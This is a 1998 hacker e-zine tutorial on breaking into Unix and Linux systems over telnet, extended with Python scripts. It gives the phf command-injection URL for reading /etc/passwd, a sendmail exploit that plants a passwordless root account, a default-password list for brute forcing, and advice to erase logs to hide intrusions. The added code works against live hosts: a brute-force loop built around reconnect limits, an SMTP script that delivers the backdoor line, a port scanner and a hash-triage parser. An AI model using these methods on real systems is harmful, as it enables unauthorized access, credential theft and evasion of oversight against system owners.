cb0208.txt (CODBRK3.ZIP, HPAVC CD-ROM) | Text File | 1998-03-23 | 21KB | 407 lines
***Hacking Unix/Linux systems***
Via Telnet
By: Techno Phunk
O.k., there has been enough virus-writing material in our e-zine, and
I finally decided to jump in and talk a little about hacking.
For your first lesson I am going to teach you a LITTLE about
hacking Linux/Unix systems via telnet; later I will teach more
about Telenet (SprintNet) and direct dial-ups, and eventually
I will teach you how to hack VAX/VMS, but not until you have mastered
Unix/Linux should you even ATTEMPT a VAX. Believe me, it's for the elite
only, as it is NOT as buggy as Linux/Unix. Anyway, a little history on Unix.
History
--=====--
The Unix OS originated at AT&T in the early 1970s. Because Unix was able
to run on different hardware from different vendors, developers were able
to modify the OS and distribute their own versions. USL's (Unix System
Laboratories, the later owners) System V, the Berkeley Software Distribution
(BSD, from the University of California, Berkeley), Xenix, etc. are just a
few examples. Now on with the show...
Unix and Linux systems have been known to have multiple
exploits that can be used against them, one of which is the famous
phf bug: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
(the %0a is an encoded newline; phf did not filter it, so whatever follows
it runs on the server as a second shell command, here a cat of the passwd
file). This bug of course is almost totally outdated, with the exception
of a lot of the lesser-known .edu sites and some .gov/.net sites. Of course
many other bugs are also unique to this system, such as the Sendmail bugs,
like the one where the software could send mail DIRECTLY to a file,
so someone could write an extra account into the passwd file and gain
root access. I personally have a multitude of exploits that I have
memorised and could use anywhere without referring to any
files. From here on, I will be telling a lot more about hacking
Unix systems (and Linux; they are basically the same thing) from a telnet
platform, what to do, etc....
First of all, before hacking a system, examine it, and get all the
info you can on it: finger them (port 79), ping them, do whatever
you can to get all the info possible, think about who the sysop is, etc.
Just don't do any destruction, as this is *LAME*; it makes you a CYBERPUNK,
not a hacker, and last but not least it makes people WANT to catch you
and spend money looking for you. Also, the FBI/Secret Service won't
take the case unless $1000 of damages is done.
Now then
------
You need a good telnet program, such as the one that comes with
Win95, or my personal favourite, EWAN; anyway, any telnet software
should be fine. You will also need a PPP/SLIP/Winsock
connection. If you are on AOL, don't despair; it will work as long
as you use v3.0 of AOL or above.
Now that you have found a good telnet program we can go on...
Now somehow you must get a password to this system, preferably
to the sysadmin account or root (note that most systems restrict where
root may log in from; on Linux the list of allowed terminals is
/etc/securetty, so a remote root login is usually refused and you will
have to get in as an ordinary user first) or any of the shell
accounts (if you wish). Anyway, there are several ways to do this. The
first would be social engineering, if that is possible. Social engineering
is quite simple: all you must do is trick a person into giving you
information. A lesson on social engineering will be covered in the next
file (if I get around to it, in this issue).
Next you can pull an exploit such as the phf bug (if it hasn't already been
taken off), and if you do pull the phf bug, look at the second field of
each line. If the file looks like this:
root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
^ notice the star
then forget it: the file is shadowed, meaning the real hashes are kept in a
root-only file (/etc/shadow on Linux and System V, /etc/master.passwd on the
BSDs) and the * (or an x) is only a placeholder, or marks a disabled
account. You will need to try something else.
But if it looks sort of like this:
root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:dCDa2Hn:1:1:system background account:/:
(the file will look SOMETHING like this; a real crypt(3) hash is 13
characters from the set A-Z, a-z, 0-9, . and /, the first two being the
salt) then you are home free to download it and run a password cracker on
it. Yet this is not hacking yet... in order for any type of break-in (into
a computer) to become a hack you must learn about the system, how it works
and the like, since hacking is simply a way of gathering information.
Now, if the phf bug or one of the many exploits works and you get the
UNshadowed passwd file, then all you must do is crack it, and write down
or save all the logins and passwords that were found (some crackers do this
for you). I personally use Cracker Jack with multiple word lists. Now move
on to the next stage, which will be picked up after I tell what to do if
this doesn't work.
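The "look at the second field" check above is easy to get wrong by eye on a
big file, so here is a small parser that does it. This is an added example,
not code from the original article; the two sample files are constructed
(the 13-character hash is made up, not a real account) and are shaped like
the two cases the text describes. It also flags any extra uid-0 entry, which
is exactly what a planted passwd line looks like, so the same script is
useful when checking your own boxes.

```python
import re
from dataclasses import dataclass

# Traditional DES crypt(3): 13 chars of [A-Za-z0-9./], first two are the salt.
CRYPT_RE = re.compile(r"^[A-Za-z0-9./]{13}$")


@dataclass
class Entry:
    name: str
    pwfield: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def status(self) -> str:
        """What the second field tells you about the account."""
        f = self.pwfield
        if f == "":
            return "empty"      # no password at all: log in and just press Enter
        if f in ("x", "*"):
            return "shadowed"   # hash kept in /etc/shadow or master.passwd, or disabled
        if f.startswith(("!", "*LK*")):
            return "locked"     # explicitly locked account
        if CRYPT_RE.match(f):
            return "hash"       # something to feed Cracker Jack / john
        return "unknown"        # e.g. $1$ MD5 hashes, or garbage


def parse_passwd(text: str) -> list[Entry]:
    """Parse passwd-format lines. Anything that is not a 7-field entry with a
    numeric uid/gid (blank lines, comments, mail headers appended by the
    sendmail trick) is skipped rather than crashing the parser."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        entries.append(Entry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def is_shadowed(entries: list[Entry]) -> bool:
    """True when there is nothing crackable in the file at all."""
    return all(e.status in ("shadowed", "locked") for e in entries)


def crackable(entries: list[Entry]) -> list[str]:
    return [e.name for e in entries if e.status == "hash"]


def passwordless(entries: list[Entry]) -> list[str]:
    return [e.name for e in entries if e.status == "empty"]


def extra_uid0(entries: list[Entry]) -> list[str]:
    """Any uid-0 account other than root: a back door, planted or forgotten."""
    return [e.name for e in entries if e.uid == 0 and e.name != "root"]


# Constructed samples in the two shapes the text describes (hash is made up).
SHADOWED = """root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
"""

UNSHADOWED = """root:Nj1hKGq3zQ9uM:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
Received: from attacker.example by victim.example; Mon, 23 Mar 1998 12:00:00 -0500
Wizard::0:0:Super User:/:/bin/csh
"""

if __name__ == "__main__":
    for label, blob in (("shadowed", SHADOWED), ("unshadowed", UNSHADOWED)):
        ents = parse_passwd(blob)
        print(label, "-> shadowed:", is_shadowed(ents),
              "crackable:", crackable(ents),
              "no password:", passwordless(ents),
              "extra uid 0:", extra_uid0(ents))
```

Run it on a file you pulled back and `crackable()` is the list of accounts
worth the cracker's time; an empty list with `is_shadowed()` true is the
"forget it" case. The stray Received: header in the second sample shows why
the parser must tolerate junk lines rather than assume a clean file.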
If no exploits work then you're going to have to go with the next
part... brute forcing and defaults.
I will be nice and include one of my personal (ONE of them) lists
that I use for brute forcing. Brute forcing is covered in the latest
issue of 2600 magazine (Volume 14, Number 3, Autumn 1997), but I will explain
this ancient art here too. Brute forcing is basically the act of
hammering out passwords at a specific account name (such as, in this
example, sysadmin) until you get in. This is the last resort for getting
into a system that seems to have NO exploits or wide-open
back doors. Brute forcing can be done tediously by hand or
simply by a script. The problem with bruting Unix systems is that
after 3 failed login attempts (in most cases) login/telnetd will simply
disconnect you, so you have to see how many chances you get per
connection and then program the script to reconnect accordingly. Keep in
mind that all your activities are probably going to be logged (failed
logins go to syslog, usually /var/log/messages or /var/adm/messages, and
successful ones to wtmp and lastlog), so once you get in, modify those logs
to cover your tracks, or use a program (available almost ANYWHERE).
Anyway.... here is a list of default passwords and logins to try first,
before you attempt a brute force. In most cases this list may work, or
then again it may not; it just depends on the system admin's IQ :).
------------------------------------------------------------------
Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
SYSTEM OPERATOR
SYSTEM MANAGER
SYSTEM SYSTEM
SYSTEM SYSLIB
OPERATOR OPERATOR
SYSTEST UETP
SYSTEST SYSTEST
SYSTEST TEST
SYSMAINT SYSMAINT
SYSMAINT SERVICE
SYSMAINT DIGITAL
FIELD FIELD
FIELD SERVICE
GUEST GUEST
GUEST unpassworded
DEMO DEMO
DEMO unpassworded
TEST TEST
Note: unpassworded means just hit enter when it prompts for a password.
The upper-case entries (SYSTEM/MANAGER, FIELD/SERVICE, SYSTEST/UETP and
so on) are the classic DEC VAX/VMS defaults rather than Unix ones; VMS
usernames are case-insensitive, Unix logins are not, so type them exactly.
-------------------------------------------------------------------
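Here is the "program the script accordingly" part done in code, as an added
example that is not from the original article. It parses a subset of the
default list above (the unpassworded entries become an empty password), then
feeds the attempts to a login that drops the connection after 3 failures,
reconnecting as needed. The target here is a constructed stand-in with one
known valid login so it runs offline; it also records the syslog-style lines
a real login(1) would write, to make the "you are being logged" point
concrete. `attempt` can be replaced by a telnetlib or socket session to run
it for real.

```python
from typing import Callable, Optional

# Subset of the default list printed above, in the same two-column layout.
DEFAULTS = """\
Login: Password:
root root
root system
sys sys
sys system
admin admin
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
guest guest
GUEST unpassworded
DEMO unpassworded
"""


def parse_defaults(text: str) -> list[tuple[str, str]]:
    """Turn the two-column table into (login, password) pairs."""
    pairs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or parts[0].endswith(":"):
            continue  # blank lines, rules, and the "Login: Password:" header
        user, pw = parts
        pairs.append((user, "" if pw == "unpassworded" else pw))
    return pairs


class FakeTelnetLogin:
    """Constructed stand-in for telnetd/login: N tries, then 'Connection closed'."""

    def __init__(self, valid: dict[str, str], max_tries: int = 3):
        self.valid, self.max_tries = valid, max_tries
        self.connections = 0
        self.log: list[str] = []  # what syslog would get on the target

    def connect(self) -> Callable[[str, str], bool]:
        self.connections += 1
        tries = 0

        def attempt(user: str, pw: str) -> bool:
            nonlocal tries
            if tries >= self.max_tries:
                raise ConnectionError("Connection closed by foreign host.")
            tries += 1
            ok = self.valid.get(user) == pw
            self.log.append(
                f"login: {'LOGIN' if ok else 'LOGIN FAILURE'} FROM attacker.example, {user}")
            return ok

        return attempt


def brute(pairs: list[tuple[str, str]],
          connect: Callable[[], Callable[[str, str], bool]],
          per_session: int = 3) -> tuple[Optional[tuple[str, str]], int]:
    """Try every pair, opening a fresh connection every `per_session` attempts.
    Returns (winning pair or None, connections used)."""
    queue = list(pairs)
    sessions = 0
    while queue:
        attempt = connect()
        sessions += 1
        for _ in range(per_session):
            if not queue:
                break
            user, pw = queue.pop(0)
            if attempt(user, pw):
                return (user, pw), sessions
    return None, sessions


def failures(log: list[str]) -> int:
    """How many failed logins the target's syslog now holds."""
    return sum("FAILURE" in line for line in log)


if __name__ == "__main__":
    target = FakeTelnetLogin({"sysadmin": "admin"})
    hit, sessions = brute(parse_defaults(DEFAULTS), target.connect, per_session=3)
    print("found:", hit, "in", sessions, "connections")
    print("target logged", failures(target.log), "failures:")
    print("\n".join(target.log))
```

Note the cost: one hit took nine attempts over three connections and left
eight LOGIN FAILURE lines on the target, which is precisely the pattern an
admin (or a script of theirs) looks for.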
Now then, I will now cover some basic exploits, etc., and the brute force
list will be attached to the bottom of this file.
Exploits.
==========
Most exploits covered here are probably not going to work on, like, the
CIA or something like that, but these are classic and common exploits.
If you want to see more "up to date" exploits I recommend rootshell.com,
which has a NICE collection that is useful for some situations.
The following bugs will need you to have at least an IQ of 2 and
telnet/ftp/http/etc. programs.
First of all I'd like to cover some of the "sendmail exploits".
One of the most famous, but usually unlikely to work on up-to-date systems;
in other words, if the system you're hacking is kept up to date and
is patched CONSTANTLY, then chances are 10 to 1 it won't work, but you never
know, so TRY IT! It never hurts to T-R-Y. When people say "teach me to hack"
I say "trial and error", and that is all; what else do I need to say?
Well, basically this exploit takes advantage of old Sendmail's willingness to
deliver mail DIRECTLY to files on the host system, e.g. TO: /etc/passwd.
Anyway, what you do is basically send mail to the passwd file and
then log in with the "unpassworded" root-access account that
you create. Now, since I know this is a "newbie" file, I will explain
a bit about sendmail: how to use it, what it is, its past, future, and
its role in the Unix/Linux/BSD environment.
Sendmail is obviously an SMTP program; SMTP stands for Simple Mail
Transfer Protocol, if I am correct (I hit my head many times on walls and
things). Anyway, basically it allows a user to send mail to any internet
or local user. The Sendmail program, like the finger program, runs on a
certain port: finger runs on port 79 and is USUALLY open for remote
access, but sendmail (port 25) is nearly ALWAYS open, unless the site
doesn't run sendmail, which is still EXTREMELY unusual; the only people I
know that don't run it are fellow hackers. Anyway, in order to access it you
must *TELNET* (remember that program I told you to get) to port 25 of your
target machine. Now, in order to get the target machine's IP address you
must do a DNS lookup (or a whois). You may get a DNS lookup/whois program
for Windows; all you need is a valid internet connection, but I use either
a) a shell account, b) InterNIC (http://www.internic.com) or c) /dns on
mIRC, in other words "/dns yahoo.com", and then it will say "Resolved
yahoo.com to" and then a number, which is the IP. Now you have the IP of
your target, and you must telnet to that host. Now, if you're smart, or
like me, you WILL be sure you know all the information possible about your
"target". Back to sendmail: when you first connect it SHOULD say SOMETHING
like this:
220 hostname ESMTP Sendmail 8.x.y/8.x.y; (date) ... anyway, something like
that. The banner gives you the exact version, and that version string is the
first thing to check against an exploit list before you waste time.
Once you see this, hit enter (it should report something like "500 Command
unrecognized"); this is needed since we are using a telnet program, not an
SMTP program, and it confirms the session is live. Anyway, from here you can
explore the commands (type HELP), or otherwise hang with me for a moment.
From here, to pull the exploit, you do the following.
MAIL FROM: root@whatever.com (this could be whatever you want)
RCPT TO: /etc/passwd
Now, if it says "550 ... Cannot mail directly to files" then forget this
exploit: every sendmail from the last several years refuses file and
program recipients from the network. Otherwise type:
DATA
Then it should say something like:
354 Enter mail, end with "." on a line by itself
Then you type:
Wizard::0:0:Super User:/:/bin/csh
.
Now it should say "250 ... Message accepted for delivery". The whole
message, mail headers included, is appended to the end of /etc/passwd,
which is why the body is one complete passwd line with an empty password
field (the :: after the name) and uid 0.
Now then, you can change Wizard to whatever, but for a beginner, just leave
it. Now, since this worked, you may go through "normal" telnet (port 23),
and the login would be Wizard; for the password just hit enter. Now wasn't
that easy?
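The same dialogue as a script that reads each reply code and stops at the
right place, so you are not squinting at a telnet window. This is an added
example, not from the original article. Both "servers" are constructed:
one replays the replies of an old sendmail that accepts a file recipient,
the other the 550 refusal described above. The `SocketTransport` class is
what you would hand in instead to talk to a real port 25; the hostnames
attacker.example and victim.example are placeholders.

```python
import socket


def code(reply: str) -> int:
    """Numeric status from an SMTP reply (its first three characters)."""
    return int(reply[:3])


class ScriptedServer:
    """Constructed SMTP peer replaying canned replies so the dialogue runs offline."""

    def __init__(self, banner: str, replies: dict[str, str]):
        self.out = [banner]      # replies waiting to be read
        self.replies = replies   # command prefix -> reply line
        self.sent: list[str] = []
        self.in_data = False

    def recv(self) -> str:
        return self.out.pop(0)

    def send(self, line: str) -> None:
        self.sent.append(line)
        if self.in_data:         # message body: silence until the lone "."
            if line == ".":
                self.in_data = False
                self.out.append("250 Message accepted for delivery")
            return
        for prefix, reply in self.replies.items():
            if line.upper().startswith(prefix):
                self.in_data = prefix == "DATA" and reply.startswith("354")
                self.out.append(reply)
                return
        self.out.append("500 Command unrecognized")


class SocketTransport:
    """Real peer: same send/recv interface over a TCP connection to port 25."""

    def __init__(self, host: str, port: int = 25, timeout: float = 10.0):
        self.sock = socket.create_connection((host, port), timeout)
        self.f = self.sock.makefile("rb")

    def send(self, line: str) -> None:
        self.sock.sendall((line + "\r\n").encode("latin-1"))

    def recv(self) -> str:
        lines = []
        while True:  # "250-..." continues a multi-line reply, "250 ..." ends it
            line = self.f.readline().decode("latin-1").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":
                return "\n".join(lines)


def try_file_delivery(conn, sender: str, path: str, passwd_line: str):
    """Run HELO / MAIL FROM / RCPT TO / DATA against `conn`. Returns
    ('accepted' | 'refused' | 'error', transcript). 'refused' is the 550 on
    RCPT TO, i.e. the server will not deliver to a file: stop there."""
    transcript: list[str] = []

    def say(line):
        conn.send(line)
        transcript.append("C: " + line)

    def hear():
        reply = conn.recv()
        transcript.append("S: " + reply)
        return reply

    if code(hear()) != 220:
        return "error", transcript
    # Same syntax as the article (no angle brackets); old sendmail accepted it.
    steps = [("HELO attacker.example", 250, "error"),
             (f"MAIL FROM: {sender}", 250, "error"),
             (f"RCPT TO: {path}", 250, "refused"),
             ("DATA", 354, "error")]
    for cmd, want, failure in steps:
        say(cmd)
        if code(hear()) != want:
            say("QUIT"); hear()
            return failure, transcript
    say(passwd_line)   # ends up as the last line of the target file
    say(".")
    outcome = "accepted" if code(hear()) == 250 else "error"
    say("QUIT"); hear()
    return outcome, transcript


REPLIES = {"HELO": "250 victim.example Hello attacker.example, pleased to meet you",
           "MAIL FROM": "250 Sender ok",
           "RCPT TO": "250 Recipient ok",
           "DATA": '354 Enter mail, end with "." on a line by itself',
           "QUIT": "221 victim.example closing connection"}
PASSWD_LINE = "Wizard::0:0:Super User:/:/bin/csh"


def old_sendmail() -> ScriptedServer:
    return ScriptedServer("220 victim.example Sendmail ready", REPLIES)


def patched_sendmail() -> ScriptedServer:
    return ScriptedServer("220 victim.example ESMTP Sendmail ready",
                          {**REPLIES, "RCPT TO": "550 /etc/passwd... Cannot mail directly to files"})


if __name__ == "__main__":
    for name, srv in (("old", old_sendmail()), ("patched", patched_sendmail())):
        outcome, log = try_file_delivery(srv, "root@whatever.com", "/etc/passwd", PASSWD_LINE)
        print(name, "->", outcome)
        print("\n".join(log), end="\n\n")
```

The script never sends the passwd line unless RCPT TO came back 250, so
against a patched host the only trace left is a HELO, a MAIL FROM and one
refused RCPT in the mail log.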
Now, one more program you may want to get is a port scanner.
This will find all open ports for you and tell you what they are.
Now, for those with trouble finding one, here is a list of "cool" ports
to try out (BTW, this is from my personal collection; I don't remember,
however, where I got it; it is in the standard BSD /etc/services layout:
name, port/protocol, aliases, then a # comment):
Note: some of these will be open on some systems, others won't (chance).
-----------------------------
tcpmux 1/tcp # rfc-1078
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp
domain 53/udp
mtp 57/tcp # deprecated
bootps 67/udp # bootp server
bootpc 68/udp # bootp client
tftp 69/udp
gopher 70/tcp # gopher server
rje 77/tcp
finger 79/tcp
http 80/tcp
www 80/tcp
link 87/tcp ttylink
kerberos 88/udp kdc
kerberos 88/tcp kdc
supdup 95/tcp # BSD supdupd(8)
hostnames 101/tcp hostname # usually to sri-nic
iso-tsap 102/tcp
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop-2 109/tcp # PostOffice V.2
pop-3 110/tcp # PostOffice V.3
pop 110/tcp # PostOffice V.3
sunrpc 111/tcp
sunrpc 111/tcp portmapper # RPC 4.0 portmapper TCP
sunrpc 111/udp
sunrpc 111/udp portmapper # RPC 4.0 portmapper UDP
auth 113/tcp ident # User Verification
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/tcp # Network Time Protocol
ntp 123/udp # Network Time Protocol
netbios-ns 137/tcp nbns
netbios-ns 137/udp nbns
netbios-dgm 138/tcp nbdgm
netbios-dgm 138/udp nbdgm
netbios-ssn 139/tcp nbssn
imap 143/tcp # imap ntwrk mail prtcl
NeWS 144/tcp news # Window System
snmp 161/udp
snmp-trap 162/udp
exec 512/tcp # BSD rexecd(8)
biff 512/udp comsat
login 513/tcp # BSD rlogind(8)
who 513/udp whod # BSD rwhod(8)
shell 514/tcp cmd # BSD rshd(8)
syslog 514/udp # BSD syslogd(8)
printer 515/tcp spooler # BSD lpd(8)
talk 517/udp # BSD talkd(8)
ntalk 518/udp # SunOS talkd(8)
efs 520/tcp # for LucasFilm
route 520/udp router routed # 521/udp too
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc # experimental
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp # emergency broadcasts
uucp 540/tcp uucpd # BSD uucpd(8) UUCP serv
klogin 543/tcp # Kerberos authen rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff rem filesys
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
pcserver 600/tcp # ECD Integrated PCb svr
mount 635/udp # NFS Mount Service
pcnfs 640/udp # PC-NFS DOS Authen
bwnfs 650/udp # BW-NFS DOS Authen
kerberos-adm 749/tcp # Kerberos 5adm/changepw
kerberos-adm 749/udp # Kerberos 5adm/changepw
kerberos-sec 750/udp # Kerberos authen--udp
kerberos-sec 750/tcp # Kerberos authen--tcp
kerberos_master 751/udp # Kerberos authen
kerberos_master 751/tcp # Kerberos authen
krb5_prop 754/tcp # Kerberos slave propaga
listen 1025/tcp listener RFS remote_file_sharing
nterm 1026/tcp remote_login network_terminal
kpop 1109/tcp # Pop with Kerberos
ingreslock 1524/tcp
tnet 1600/tcp # transputer net daemon
mud(2000) 2000/tcp ## Diku2 MultiUser Dimen
cfinger 2003/tcp # GNU finger
nfs 2049/udp # NFS File Service
eklogin 2105/tcp # Kerberos encrypT rlogi
mud(4000) 4000/tcp ## Diku2 MultiUser Dimen
mud(4240) 4240/tcp ## Diku2 MultiUser Dimen
mud(4242) 4242/tcp ## Diku2 MultiUser Dimen
krb524 4444/tcp # Kerberos 5 to 4 ticket
irc(6666) 6666/tcp ## Alternate IRC port
irc 6667/tcp # Internet Relay Chat
irc(6668) 6668/tcp ## Alternate IRC port
dos 7000/tcp msdos
-------------------------------------------------------------------
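If you cannot find a scanner, a connect() scanner that labels its hits from
the list above is a few lines. This is an added example, not from the
original article; it parses a subset of the table in the /etc/services
layout shown, and the probe is injectable so it runs here against a
constructed host with a known set of open ports. Pass `tcp_probe` (a real
socket connect with a timeout) to scan an actual machine; victim.example is
a placeholder hostname.

```python
import socket
from typing import Callable, Iterable

# Subset of the list above, same layout: name port/proto [aliases] [# comment]
SERVICES = """\
echo 7/tcp
discard 9/tcp sink null
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
finger 79/tcp
http 80/tcp
sunrpc 111/tcp portmapper # RPC 4.0 portmapper TCP
exec 512/tcp # BSD rexecd(8)
login 513/tcp # BSD rlogind(8)
shell 514/tcp cmd # BSD rshd(8)
syslog 514/udp # BSD syslogd(8)
"""


def parse_services(text: str) -> dict[tuple[int, str], str]:
    """Map (port, protocol) -> service name; first name wins for duplicates."""
    table: dict[tuple[int, str], str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop the comment column
        parts = line.split()
        if len(parts) < 2 or "/" not in parts[1]:
            continue
        port, proto = parts[1].split("/", 1)
        if not port.isdigit():
            continue
        table.setdefault((int(port), proto), parts[0])
    return table


def tcp_probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Real probe: True if something on host accepted a TCP connection to port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(host: str, ports: Iterable[int], services: dict,
         probe: Callable[[str, int], bool] = tcp_probe) -> list[tuple[int, str]]:
    """Return (port, name) for every port that answered, 'unknown' if unlisted."""
    return [(p, services.get((p, "tcp"), "unknown")) for p in ports if probe(host, p)]


def fake_host(open_ports: set[int]) -> Callable[[str, int], bool]:
    """Constructed stand-in for a target with a known set of listening ports."""
    return lambda host, port: port in open_ports


if __name__ == "__main__":
    svc = parse_services(SERVICES)
    candidates = sorted({p for p, proto in svc if proto == "tcp"} | {6000})
    for port, name in scan("victim.example", candidates,
                           svc, probe=fake_host({23, 25, 79, 6000})):
        print(f"{port:5d}/tcp  {name}")
```

Anything that answers but is not in your list (port 6000 above, where X11
usually lives) is worth a manual look; the list only names what you already
know about.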
Anyway, I won't list many more exploits now, as there are millions of them
on the net, especially around http://www.rootshell.com.
Now, I will go into what you do once you are in....
Commands that are useful to you at this time are going to be things like:
ls * list files (ls -la also shows hidden files, permissions and owners)
cd * change directory; note: cd .. goes up one level, cd / goes to the
* top of the tree (instead of the MS-DOS cd\), and cd alone goes home
who * who's online
finger * get info on a user
pico * one of the text editors (vi is on every Unix, pico is not)
cat * display a file (like TYPE in MS-DOS)
cc * compiler for C programs (exploits ;)
That should get you started; note that these work the same in the Bourne,
C and Korn shells...
Now, lastly, I hope that you have learned something from all this...
More info can be found at: http://www.angelfire.com/nc/TechnoPhunk/index.html
under the hacking page. I am trying to get more stuff on it, but there are
some other tutorials and other info there, so be sure to stop by.
Now, for a word on ethics....
1. thou shalt not change anything except for the logs (to cover yourself)
2. thou shalt not do destruction
3. don't tell your friends/family/etc. that you are a hacker
4. never tell your real name to other hackers
5. never leave behind your handle or name on a hacked server
6. be kind
That's about all for this lesson.... I realise it was short, and not VERY
informative, but it should give you a start. I hope to cover more on
Unix hacking next time, possibly a bit more on the BSDs and Linux.
Send me suggestions.... TechnoPhunk@thepentagon.com
- Techno Phunk